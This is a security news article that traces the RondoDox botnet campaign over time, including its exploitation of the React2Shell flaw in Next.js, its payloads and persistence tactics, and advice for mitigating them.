The Rise of a New Threat Understanding the RondoDox-React2Shell Connection
A persistent and increasingly sophisticated cyber threat known as the RondoDox botnet has been actively compromising Internet of Things (IoT) devices and web servers for over nine months, recently escalating its campaign by weaponizing a critical vulnerability. This new attack vector leverages React2Shell, a remote code execution flaw with a perfect 10.0 CVSS score, amplifying the botnet’s reach and impact. The following timeline dissects the strategic evolution of this campaign, from its initial reconnaissance to its current, large-scale exploitation of this severe flaw. Understanding this progression is crucial for organizations, especially as over 90,000 internet-facing instances remain vulnerable, highlighting a widespread and urgent security risk that demands immediate attention.
The RondoDox Campaign A Timeline of Escalation
March – April 2025 – The Initial Reconnaissance Phase
The RondoDox campaign began discreetly, with its operators conducting initial reconnaissance and manual vulnerability scanning. During this early stage, attackers focused on methodically identifying potential targets and testing weaknesses in an exploratory, low-and-slow manner. This careful approach was designed to avoid detection while laying the essential groundwork for the more aggressive and automated attacks that would follow in the subsequent months.
April – June 2025 – The Mass Probing Phase
Building on their initial findings, RondoDox operators significantly ramped up their efforts, shifting from targeted exploration to daily mass vulnerability probing. The campaign’s scope broadened considerably to target a wide range of web applications, including popular content management systems like WordPress and Drupal, as well as common IoT hardware such as Wavlink routers. This phase marked a clear transition from careful exploration to high-volume, opportunistic attacks aimed at rapid expansion.
July – Early December 2025 – The Automation and Scale Phase
The botnet’s methodology evolved further as threat actors implemented hourly automated deployment on a massive scale. This critical shift maximized the campaign’s reach and operational efficiency, allowing the botnet to grow exponentially by continuously scanning for and infecting vulnerable systems without requiring manual intervention. It was during this period that RondoDox also integrated other known N-day vulnerabilities, such as CVE-2023-1389, into its arsenal to diversify its attack vectors.
December 2025 – The React2Shell Exploitation Phase
The campaign’s most alarming development occurred when its operators began leveraging the critical React2Shell flaw (CVE-2025-55182). Attackers initiated widespread scans to find vulnerable Next.js servers and, upon successful exploitation, dropped a sophisticated multi-stage payload. This payload included cryptocurrency miners, a botnet loader and health checker located at “/nuts/bolts,” and a variant of the notorious Mirai botnet, effectively hijacking the infected device and enslaving it into the attacker’s network.
Key Turning Points and Overarching Patterns
The RondoDox campaign’s most significant turning point was its adoption of the React2Shell vulnerability, which enabled a fresh and potent wave of infections on systems that may have been previously secure. This strategic move demonstrates a key pattern in modern botnet operations: the rapid weaponization of newly disclosed, high-impact flaws before organizations have a chance to apply patches. The overarching theme is one of constant evolution, as RondoDox continuously expands its arsenal to maximize its infection potential. Furthermore, this campaign highlights a notable gap in cybersecurity defense—the slow pace of patching—with tens of thousands of servers in the U.S. and Europe remaining susceptible long after a fix has been made available.
A Deeper Look The Botnet’s Tactics and Defensive Measures
A closer examination of the RondoDox payload reveals a sophisticated design intended not only to infect systems but also to maintain absolute control. The “/nuts/bolts” component acts as an aggressive defense mechanism, systematically terminating competing malware and coin miners on a compromised system. It actively removes rival botnets, Docker-based payloads, and associated cron jobs to ensure its singular dominance. Moreover, it establishes persistence via “/etc/crontab” and continuously scans running processes to kill any non-whitelisted executables, effectively preventing reinfection by other threat actors. To mitigate this threat, experts strongly advise organizations to update Next.js to a patched version immediately, segment IoT devices onto dedicated VLANs, deploy a Web Application Firewall (WAF), and actively monitor for suspicious process execution while blocking known command-and-control infrastructure.
